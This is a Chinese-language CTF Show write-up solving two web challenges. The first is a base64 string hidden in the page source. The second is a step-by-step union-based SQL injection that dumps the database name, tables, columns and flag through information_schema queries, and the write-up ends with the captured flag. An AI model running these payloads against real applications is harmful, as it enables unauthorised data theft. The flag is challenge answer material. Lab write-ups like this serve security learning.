题目来源:CTF Show
一、web签到题
1.按F12查看源代码,发现一串奇怪的绿色字符,判断为base642.采用base64解码工具获得flag
签到成功,耶~~~
二、web2(最简单的SQL注入)
1.先万能密码碰碰运气,发现成功回显
2.判断数据库字段数
1' union select 1,2,3#
发现从1~4无回显,而1~3有回显,且回显位置为2
3.查数据库名及表名
1' union select 1,database(),3# -------------回显为web2
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2' ),3#
4.发现flag表,爆出flag表字段
1' union select 1,( select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag' ),3#
5.发现flag表字段名也为flag,爆出flag字段数据
1' union select 1,flag,3 from flag#
获得flag{1d4d791c-28b2-4cd3-ae09-3cbef8913519}